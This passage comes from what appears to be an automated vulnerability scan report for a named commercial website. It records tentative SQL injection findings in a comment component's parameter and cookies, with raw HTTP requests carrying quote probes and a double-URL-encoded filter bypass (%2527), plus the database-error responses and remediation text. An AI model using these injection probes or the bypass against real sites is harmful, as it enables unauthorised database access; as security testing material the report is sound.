Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /component/jsetup/comment/add.html?commenttype=20&etid=46&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTYwJmZvcm1hdD1odG1sJnZpZXc9YXJ0aWNsZSZpZD00NiZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA%3D%3D HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/consulting.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0%2527%2527; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:13:54 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:13:56 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 08:13:56 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 27122


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.167. http://www.analyticspros.com/component/jsetup/comment/add.html [commenttype parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /component/jsetup/comment/add.html

Issue detail

The commenttype parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the commenttype parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the commenttype request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /component/jsetup/comment/add.html?commenttype=20%2527&etid=46&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTYwJmZvcm1hdD1odG1sJnZpZXc9YXJ0aWNsZSZpZD00NiZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA%3D%3D HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/consulting.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:05:13 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /component/jsetup/comment/add.html?commenttype=20%2527%2527&etid=46&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTYwJmZvcm1hdD1odG1sJnZpZXc9YXJ0aWNsZSZpZD00NiZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA%3D%3D HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/consulting.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:05:15 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:05:18 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 08:05:18 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 27167


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.168. http://www.analyticspros.com/component/jsetup/comment/add.html [fpssCookie cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /component/jsetup/comment/add.html

Issue detail

The fpssCookie cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the fpssCookie cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the fpssCookie cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /component/jsetup/comment/add.html?commenttype=20&etid=51&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTY0JmZvcm1hdD1odG1sJnZpZXc9YXJ0aWNsZSZpZD01MSZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA%3D%3D HTTP/1.1
Host: www.analyticspros.com
Proxy-Connection: keep-alive
Referer: http://www.analyticspros.com/about.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; fpssCookie=true%2527; apros2.0_tpl=apros2.0; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; __utmb=26076141.26.9.1288999622937; ki_t=1288999540201%3B1288999540201%3B1288999677879%3B1%3B10; __utmmobile=0xade0ac5896f84b3c

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:14:18 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /component/jsetup/comment/add.html?commenttype=20&etid=51&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTY0JmZvcm1hdD1odG1sJnZpZXc9YXJ0aWNsZSZpZD01MSZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA%3D%3D HTTP/1.1
Host: www.analyticspros.com
Proxy-Connection: keep-alive
Referer: http://www.analyticspros.com/about.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; fpssCookie=true%2527%2527; apros2.0_tpl=apros2.0; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; __utmb=26076141.26.9.1288999622937; ki_t=1288999540201%3B1288999540201%3B1288999677879%3B1%3B10; __utmmobile=0xade0ac5896f84b3c

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:14:19 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:14:23 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 08:14:23 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 27116


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.169. http://www.analyticspros.com/component/jsetup/comment/add.html [fpssCookie cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /component/jsetup/comment/add.html

Issue detail

The fpssCookie cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the fpssCookie cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /component/jsetup/comment/add.html?commenttype=20&etid=46&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTYwJmZvcm1hdD1odG1sJnZpZXc9YXJ0aWNsZSZpZD00NiZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA%3D%3D HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/consulting.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true'; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:08:46 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /component/jsetup/comment/add.html?commenttype=20&etid=46&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTYwJmZvcm1hdD1odG1sJnZpZXc9YXJ0aWNsZSZpZD00NiZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA%3D%3D HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/consulting.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true''; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:08:47 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:08:51 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 08:08:51 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 27121


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.170. http://www.analyticspros.com/component/jsetup/comment/add.html [ki_t cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /component/jsetup/comment/add.html

Issue detail

The ki_t cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_t cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /component/jsetup/comment/add.html?commenttype=20&etid=51&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTY0JmZvcm1hdD1odG1sJnZpZXc9YXJ0aWNsZSZpZD01MSZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA%3D%3D HTTP/1.1
Host: www.analyticspros.com
Proxy-Connection: keep-alive
Referer: http://www.analyticspros.com/about.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; fpssCookie=true; apros2.0_tpl=apros2.0; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; __utmb=26076141.26.9.1288999622937; ki_t=1288999540201%3B1288999540201%3B1288999677879%3B1%3B10'; __utmmobile=0xade0ac5896f84b3c

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:21:12 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 76

Database